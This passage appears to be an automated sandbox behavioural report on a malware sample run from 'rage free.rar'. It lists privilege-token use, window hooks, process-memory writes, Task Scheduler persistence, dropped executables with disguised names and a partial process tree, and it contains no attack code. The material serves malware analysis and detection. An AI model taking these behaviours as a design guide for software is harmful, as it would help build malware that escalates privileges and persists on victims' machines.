N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeRestorePrivilege N/A C:\Program Files\7-Zip\7zFM.exe N/A
Token: 35 N/A C:\Program Files\7-Zip\7zFM.exe N/A
Token: SeSecurityPrivilege N/A C:\Program Files\7-Zip\7zFM.exe N/A
Token: SeSecurityPrivilege N/A C:\Program Files\7-Zip\7zFM.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\Nothere.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SoftwareDistribution\Download\qOTtu.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\Nothere.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\Windowshalper(legit).exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\Nothere.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SoftwareDistribution\Download\q8q5y.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\Windowshalper(legit).exe N/A
Token: SeRestorePrivilege N/A C:\Program Files\7-Zip\7zFM.exe N/A
Token: 35 N/A C:\Program Files\7-Zip\7zFM.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\Windowshalper(legit).exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files\7-Zip\7zFM.exe N/A
N/A N/A C:\Program Files\7-Zip\7zFM.exe N/A
N/A N/A C:\Program Files\7-Zip\7zFM.exe N/A
N/A N/A C:\Program Files\7-Zip\7zFM.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\Nothere.exe N/A
N/A N/A C:\Users\Admin\Desktop\VANTA\x64\Release\GeforceNOW.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4784 wrote to memory of 4548 N/A C:\Windows\system32\cmd.exe C:\Program Files\7-Zip\7zFM.exe
PID 4784 wrote to memory of 4548 N/A C:\Windows\system32\cmd.exe C:\Program Files\7-Zip\7zFM.exe
PID 3388 wrote to memory of 2460 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3388 wrote to memory of 2460 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3388 wrote to memory of 2392 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3388 wrote to memory of 2392 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3388 wrote to memory of 2392 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3388 wrote to memory of 2392 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3388 wrote to memory of 2392 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3388 wrote to memory of 2392 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3388 wrote to memory of 2392 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3388 wrote to memory of 2392 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3388 wrote to memory of 2392 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3388 wrote to memory of 2392 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3388 wrote to memory of 2392 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3388 wrote to memory of 2392 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3388 wrote to memory of 2392 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3388 wrote to memory of 2392 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3388 wrote to memory of 2392 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3388 wrote to memory of 2392 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3388 wrote to memory of 2392 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3388 wrote to memory of 2392 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3388 wrote to memory of 2392 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3388 wrote to memory of 2392 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3388 wrote to memory of 2392 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3388 wrote to memory of 2392 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3388 wrote to memory of 2392 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3388 wrote to memory of 2392 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3388 wrote to memory of 2392 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3388 wrote to memory of 2392 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3388 wrote to memory of 2392 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3388 wrote to memory of 2392 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3388 wrote to memory of 2392 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3388 wrote to memory of 2392 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3388 wrote to memory of 2392 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3388 wrote to memory of 2392 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3388 wrote to memory of 2392 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3388 wrote to memory of 2392 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3388 wrote to memory of 2392 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3388 wrote to memory of 2392 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3388 wrote to memory of 2392 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3388 wrote to memory of 2392 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3388 wrote to memory of 2392 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3388 wrote to memory of 2392 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3388 wrote to memory of 5068 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3388 wrote to memory of 5068 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3388 wrote to memory of 4032 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3388 wrote to memory of 4032 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3388 wrote to memory of 4032 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3388 wrote to memory of 4032 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3388 wrote to memory of 4032 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3388 wrote to memory of 4032 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3388 wrote to memory of 4032 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3388 wrote to memory of 4032 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3388 wrote to memory of 4032 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3388 wrote to memory of 4032 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3388 wrote to memory of 4032 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3388 wrote to memory of 4032 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3388 wrote to memory of 4032 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3388 wrote to memory of 4032 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3388 wrote to memory of 4032 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3388 wrote to memory of 4032 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3388 wrote to memory of 4032 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3388 wrote to memory of 4032 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Windows\system32\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\rage free.rar"

C:\Program Files\7-Zip\7zFM.exe

"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\rage free.rar"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ff9747646f8,0x7ff974764708,0x7ff974764718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

